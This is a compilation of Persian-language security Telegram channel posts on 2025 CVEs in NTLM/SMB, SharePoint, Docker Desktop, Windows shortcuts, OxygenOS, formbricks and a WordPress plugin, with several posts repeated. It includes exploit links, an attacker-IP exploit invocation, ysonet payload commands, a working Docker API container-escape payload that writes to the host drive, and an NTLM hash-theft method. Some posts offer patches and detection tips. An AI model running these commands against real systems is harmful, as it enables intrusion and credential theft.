🚨 CVE-2025-33073 – Reflection Issue NTLM در SMB
نوع آسیبپذیری: NTLM reflection (بازتابی)، که میتواند منجر به اجرای کد در سیستم قربانی شود.
امکان حمله:
ساختار SMB/NTLM بازتابی معمولاً در شبکههای داخلی بکار میرود، خصوصاً وقتی پروتکلهایی مثل LLMNR فعال باشند.
بهرهبرداری از طریق ابزارهایی مانند impacket-ntlmrelayx.
لینک PoC اسکپلویت:
https://github.com/mverschu/CVE-2025-33073
✅ این PoC بسیار کامل است، تا حدی که قابلیت اجرای دستور custom یا استخراج افشای اطلاعات
را دارد.
#CVE #zerosec
──────────────
📡 Follow :
👉 @zerosec_team
نوع آسیبپذیری: NTLM reflection (بازتابی)، که میتواند منجر به اجرای کد در سیستم قربانی شود.
امکان حمله:
ساختار SMB/NTLM بازتابی معمولاً در شبکههای داخلی بکار میرود، خصوصاً وقتی پروتکلهایی مثل LLMNR فعال باشند.
بهرهبرداری از طریق ابزارهایی مانند impacket-ntlmrelayx.
لینک PoC اسکپلویت:
https://github.com/mverschu/CVE-2025-33073
python3 CVE-2025-33073.py -u 'DOMAIN\User' -p 'password' \
--attacker-ip 192.168.1.5 --dns-ip 192.168.1.3 \
--dc-fqdn DC01.domain.local --target-victim-Victim1
✅ این PoC بسیار کامل است، تا حدی که قابلیت اجرای دستور custom یا استخراج افشای اطلاعات
را دارد.
#CVE #zerosec
──────────────
📡 Follow :
👉 @zerosec_team
GitHub
GitHub - mverschu/CVE-2025-33073: PoC Exploit for the NTLM reflection SMB flaw.
PoC Exploit for the NTLM reflection SMB flaw. Contribute to mverschu/CVE-2025-33073 development by creating an account on GitHub.
❤2
#rce #pentest #redteam #ad #sharepoint #cve
CVE-2025-53770: SharePoint RCE (ToolShell)
Exploit: https://github.com/soltanali0/CVE-2025-53770-Exploit
Upd: https://github.com/irsdl/ysonet
Patched: July 20, 2025
⭐️ @ZeroSec_team
CVE-2025-53770: SharePoint RCE (ToolShell)
Exploit: https://github.com/soltanali0/CVE-2025-53770-Exploit
Upd: https://github.com/irsdl/ysonet
ysonet.exe -p sharepoint --cve=CVE-2025-49704 -var 1 -c "calc"
ysonet.exe -p sharepoint --cve=CVE-2025-49704 -var 2 -c "C:\\temp\\ExploitClass.cs;System.dll"
Patched: July 20, 2025
⭐️ @ZeroSec_team
GitHub
GitHub - soltanali0/CVE-2025-53770-Exploit: SharePoint WebPart Injection Exploit Tool
SharePoint WebPart Injection Exploit Tool. Contribute to soltanali0/CVE-2025-53770-Exploit development by creating an account on GitHub.
❤4
Forwarded from Xero Notes
🐋 آسیبپذیری CVE-2025-9074 در Docker Desktop
اخیرا از آسیبپذیری جدیدی در Docker Desktop با شناسه CVE-2025-9074 کشف شده است که به مهاجمین این امکان را میدهد تا از داخل کانتینرها به سیستم میزبان دسترسی پیدا کنند. این آسیبپذیری به دلیل دسترسی بدون احراز هویت به API داخلی Docker بوده و به راحتی میتوان با استفاده از یک درخواست HTTP ساده، دسترسی کامل به سیستم میزبان پیدا کرد.
💥 این آسیبپذیری چطور به وجود آمده است؟
در Docker Desktop نسخههای قبل از ۴.۴۴.۳، هر کانتینری میتوانست به API Docker با آدرس h
💠 نمونه کد برای آزمایش آسیبپذیری
ابتدا یک کانتینر Alpine بسازید.
سپس با استفاده از پیلود زیر، آسیبپذیری را تست کنید.
این پیلود با ارسال یک درخواست HTTP به آدرس زیر،
یک کانتینر جدید با دستور
📊 امتیاز CVSS
این آسیبپذیری دارای امتیاز CVSS 9.3 (بحرانی) است و در وکتور CVSS زیر قرار میگیرد:
✅ راهحل
این آسیب پذیری در نسخه Docker Desktop ۴.۴۴.۳ برطرف شده است.
🔗 https://nvd.nist.gov/vuln/detail/CVE-2025-9074
#DockerSecurity #CVE #DockerDesktop
@Xero_Notes
اخیرا از آسیبپذیری جدیدی در Docker Desktop با شناسه CVE-2025-9074 کشف شده است که به مهاجمین این امکان را میدهد تا از داخل کانتینرها به سیستم میزبان دسترسی پیدا کنند. این آسیبپذیری به دلیل دسترسی بدون احراز هویت به API داخلی Docker بوده و به راحتی میتوان با استفاده از یک درخواست HTTP ساده، دسترسی کامل به سیستم میزبان پیدا کرد.
💥 این آسیبپذیری چطور به وجود آمده است؟
در Docker Desktop نسخههای قبل از ۴.۴۴.۳، هر کانتینری میتوانست به API Docker با آدرس h
ttp://192.168.65.7:2375 دسترسی داشته باشد بدون اینکه نیاز به احراز هویت برای استفاده از آن داشته باشد.. با استفاده از این دسترسی، مهاجم میتواند یک کانتینر جدید با دسترسیهای ویژه راهاندازی کرده و در نهایت به فولدر C: در سیستم میزبان دسترسی پیدا کند. لازم به ذکر است که این آسیب پذیری در نسخه مک نیز قابل استفاده است و امکان دسترسی روت را برای مهاجم فراهم میکند.💠 نمونه کد برای آزمایش آسیبپذیری
ابتدا یک کانتینر Alpine بسازید.
docker run -it alpine /bin/sh
سپس با استفاده از پیلود زیر، آسیبپذیری را تست کنید.
wget --header='Content-Type: application/json' \
--post-data='{"Image":"alpine","Cmd":["sh","-c","echo pwned > /mnt/host_root/pwn.txt"],"HostConfig":{"Binds":["//c/host_root:/mnt/host_root"]}}' \
-O - https://192.168.65.7:2375/containers/create > create.json
cid=$(cut -d'"' -f4 create.json)
wget --post-data='' -O - https://192.168.65.7:2375/containers/$cid/start
این پیلود با ارسال یک درخواست HTTP به آدرس زیر،
192.168.65.7:2375/containers/create
یک کانتینر جدید با دستور
echo pwned > /mnt/host_root/pwn.txt میسازد و با استفاده از قابلیت Volume در Docker، مسیر C:/host_root را به mnt/host_root/ در داخل کانتینر مپ میکند.📊 امتیاز CVSS
این آسیبپذیری دارای امتیاز CVSS 9.3 (بحرانی) است و در وکتور CVSS زیر قرار میگیرد:
CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
✅ راهحل
این آسیب پذیری در نسخه Docker Desktop ۴.۴۴.۳ برطرف شده است.
🔗 https://nvd.nist.gov/vuln/detail/CVE-2025-9074
#DockerSecurity #CVE #DockerDesktop
@Xero_Notes
❤5🔥1
🚨 آسیبپذیری Zero-Click جدید در ویندوز (CVE-2025-50154) 🚨
آسیبپذیری جدید به اسم CVE-2025-50154 کشف شده که پچ قبلی مایکروسافت (CVE-2025-24054) رو دور میزنه
این باگ به مهاجم اجازه میده بدون نیاز به کلیک کاربر (Zero-Click) هشهای NTLMv2 رو بدزده و حتی فایلهای اجرایی رو بیسروصدا دانلود کنه
چطور میشه ازش سوءاستفاده کرد
با یه فایل .lnk ساده که مسیرش به یه سرور SMB مخرب (مثل \\evil-ip\share\bad.exe) اشاره داره و آیکونش از shell32.dll محلی لود میشه میتونید Windows Explorer رو گول بزنید وقتی Explorer فایل رو رندر میکنه (مثلاً تو پوشه Downloads) یه درخواست SMB میفرسته و بوم! هش NTLMv2 کاربر لو میره تازه فایل اجرایی هم تو %TEMP% دانلود میشه
این هشها برای NTLM Relay (مثلاً به LDAP یا SMB برای Domain Takeover) یا کرک آفلاین با Hashcat عالیه میتونید با ترکیبش با CVE-2025-53770 (باگ SharePoint) به RCE برسید
کد اثبات مفهوم تو GitHub (rubenformation) هست با Responder یا Impacket یه سرور SMB راه بندازید و تو چند ثانیه هشها رو بگیرید. با Wireshark هم میتونید رفتار رو مانیتور کنید
لینک PoC
https://lnkd.in/d6w4Vk4p
🛡️برای عزیزان Blue Team: چطور جلوی این فاجعه رو بگیریم؟
ترافیک SMB خروجی رو با Zeek یا Suricata مانیتور کنید (دنبال NTLM Challenge/Response باشید) تو Event Viewer به Event ID 5145 نگاه کنید یا با EDR (مثل Defender یا CrowdStrike) رفتار مشکوک Explorer.exe رو رصد کنید
#امنیت_سایبری #ویندوز #آسیب_پذیری #Cybersecurity #RedTeam #BlueTeam #CVE_2025_50154 #NTLM #ZeroClick
⭐️ @ZeroSec_team
آسیبپذیری جدید به اسم CVE-2025-50154 کشف شده که پچ قبلی مایکروسافت (CVE-2025-24054) رو دور میزنه
این باگ به مهاجم اجازه میده بدون نیاز به کلیک کاربر (Zero-Click) هشهای NTLMv2 رو بدزده و حتی فایلهای اجرایی رو بیسروصدا دانلود کنه
چطور میشه ازش سوءاستفاده کرد
با یه فایل .lnk ساده که مسیرش به یه سرور SMB مخرب (مثل \\evil-ip\share\bad.exe) اشاره داره و آیکونش از shell32.dll محلی لود میشه میتونید Windows Explorer رو گول بزنید وقتی Explorer فایل رو رندر میکنه (مثلاً تو پوشه Downloads) یه درخواست SMB میفرسته و بوم! هش NTLMv2 کاربر لو میره تازه فایل اجرایی هم تو %TEMP% دانلود میشه
این هشها برای NTLM Relay (مثلاً به LDAP یا SMB برای Domain Takeover) یا کرک آفلاین با Hashcat عالیه میتونید با ترکیبش با CVE-2025-53770 (باگ SharePoint) به RCE برسید
کد اثبات مفهوم تو GitHub (rubenformation) هست با Responder یا Impacket یه سرور SMB راه بندازید و تو چند ثانیه هشها رو بگیرید. با Wireshark هم میتونید رفتار رو مانیتور کنید
لینک PoC
https://lnkd.in/d6w4Vk4p
🛡️برای عزیزان Blue Team: چطور جلوی این فاجعه رو بگیریم؟
ترافیک SMB خروجی رو با Zeek یا Suricata مانیتور کنید (دنبال NTLM Challenge/Response باشید) تو Event Viewer به Event ID 5145 نگاه کنید یا با EDR (مثل Defender یا CrowdStrike) رفتار مشکوک Explorer.exe رو رصد کنید
#امنیت_سایبری #ویندوز #آسیب_پذیری #Cybersecurity #RedTeam #BlueTeam #CVE_2025_50154 #NTLM #ZeroClick
⭐️ @ZeroSec_team
lnkd.in
LinkedIn
This link will take you to a page that’s not on LinkedIn
❤4❤🔥1
محققای Rapid7 یک آسیب پذیری با شناسه ی CVE-2025-10184 و از نوع Blind SQL Injection، در سیستم عامل OxygenOS کشف و گزارش کردن که به یک برنامه، امکان دسترسی به داده ها و متادیتای SMS/MMS رو میده.
سیستم عامل OxygenOS، یک سیستم عامل مبتنی بر اندروید از شرکت چینی OnePlus، زیر مجموعه ی Oppo هستش.
محققا این آسیب پذیری رو یک مه، 11 اردیبهشت برای شرکت ارسال کردن، اما نتیجه ای نداشته، در نهایت گزارش فنی + PoC برای این آسیب پذیری رو بصورت عمومی منتشر کردن.
آسیب پذیری فعلا اصلاح نشده، بنابراین توصیه شده:
- برنامه های نصب شده روی گوشی رو به حداقل برسونید.
- به برنامه های معتبر از ناشران معتبر، اعتماد کنید.
- از احراز هویت دو عاملی مبتنی بر پیامک به برنامه های OTP مانند Google Authenticator مهاجرت کنید.
- با توجه به اینکه پیامک ها در دستگاههای OnePlus بدرستی ایزوله نشدن، توصیه شده ارتباطات حساس رو تنها از طریق اپلیکیشن های رمزگذاریشدهی سرتاسری (E2EE) انجام بدید.
- در ایران باید مراقب رمزهای دوم بانکی و ... هم باشیم.
#آسیب_پذیری_امنیتی
#PoC #OxygenOS #Oppo #OnePlus #CVE
⭐️ @ZeroSec_team
سیستم عامل OxygenOS، یک سیستم عامل مبتنی بر اندروید از شرکت چینی OnePlus، زیر مجموعه ی Oppo هستش.
محققا این آسیب پذیری رو یک مه، 11 اردیبهشت برای شرکت ارسال کردن، اما نتیجه ای نداشته، در نهایت گزارش فنی + PoC برای این آسیب پذیری رو بصورت عمومی منتشر کردن.
آسیب پذیری فعلا اصلاح نشده، بنابراین توصیه شده:
- برنامه های نصب شده روی گوشی رو به حداقل برسونید.
- به برنامه های معتبر از ناشران معتبر، اعتماد کنید.
- از احراز هویت دو عاملی مبتنی بر پیامک به برنامه های OTP مانند Google Authenticator مهاجرت کنید.
- با توجه به اینکه پیامک ها در دستگاههای OnePlus بدرستی ایزوله نشدن، توصیه شده ارتباطات حساس رو تنها از طریق اپلیکیشن های رمزگذاریشدهی سرتاسری (E2EE) انجام بدید.
- در ایران باید مراقب رمزهای دوم بانکی و ... هم باشیم.
#آسیب_پذیری_امنیتی
#PoC #OxygenOS #Oppo #OnePlus #CVE
⭐️ @ZeroSec_team
Rapid7
CVE-2025-10184: OnePlus OxygenOS Telephony provider permission bypass (NOT FIXED)
👍5
Forwarded from GO-TO CVE (| | Sharo K h | |)
سرویس اوپن سورس formbricks یه cve خورده
۱۱ هزار star داره توی گیتهاب و بیشتر از ۱۰۰ تا Contributors
حالا باگش چی بوده
موقعی که jwt رو decode میکنه هیچ secret key یا الگوریتمی برای وریفای کردن استفاده نمیکنه
https://github.com/formbricks/formbricks/security/advisories/GHSA-7229-q9pv-j6p4
#CVE-2025-59934
۱۱ هزار star داره توی گیتهاب و بیشتر از ۱۰۰ تا Contributors
حالا باگش چی بوده
موقعی که jwt رو decode میکنه هیچ secret key یا الگوریتمی برای وریفای کردن استفاده نمیکنه
export const verifyToken = async (token: string): Promise<JwtPayload> => {
// First decode to get the ID
const decoded = jwt.decode(token);
const payload: JwtPayload = decoded as JwtPayload;
https://github.com/formbricks/formbricks/security/advisories/GHSA-7229-q9pv-j6p4
#CVE-2025-59934
GitHub
Missing JWT signature verification in formbricks
### **Description**
---
**Vulnerability Overview**
This vulnerability stems from a token validation routine that only decodes JWTs (jwt.decode) without verifying their signatures. Both ...
---
**Vulnerability Overview**
This vulnerability stems from a token validation routine that only decodes JWTs (jwt.decode) without verifying their signatures. Both ...
❤5
Forwarded from OnHex
🔴 آسیب پذیری با شناسه ی CVE-2025-11705 در افزونه ی وردپرسی Anti-Malware Security and Brute-Force Firewall کشف و اصلاح شده که امکان افشای اطلاعات رو به مهاجمی که عضو سایت (Subscriber) هستش، میده.
نسخه های تحت تاثیر: ۴.۲۳.۸۱ و قبل تر
نسخه اصلاح شده: ۴.۲۳.۸۳
سایتهایی که از نسخه های آسیب پذیر استفاده میکنن و همچنین امکان عضویت داخلشون فعال هستش، تحت تاثیر آسیب پذیری هستن.
آسیب پذیری در تابع GOTMLS_ajax_scan هستش و امکان خوندن فایلهای دلخواه رو به مهاجم میده. مثلا مهاجم میتونه فایل wp-config.php رو بخونه.
#وردپرس #آسیب_پذیری_امنیتی
#worpress #CVE
🆔 @onhex_ir
➡️ ALL Link
نسخه های تحت تاثیر: ۴.۲۳.۸۱ و قبل تر
نسخه اصلاح شده: ۴.۲۳.۸۳
سایتهایی که از نسخه های آسیب پذیر استفاده میکنن و همچنین امکان عضویت داخلشون فعال هستش، تحت تاثیر آسیب پذیری هستن.
آسیب پذیری در تابع GOTMLS_ajax_scan هستش و امکان خوندن فایلهای دلخواه رو به مهاجم میده. مثلا مهاجم میتونه فایل wp-config.php رو بخونه.
#وردپرس #آسیب_پذیری_امنیتی
#worpress #CVE
🆔 @onhex_ir
➡️ ALL Link
WordPress.org
Anti-Malware Security and Brute-Force Firewall
This Anti-Malware scanner searches for Malware, Viruses, and other security threats and vulnerabilities on your server and it helps you fix them.
❤1👍1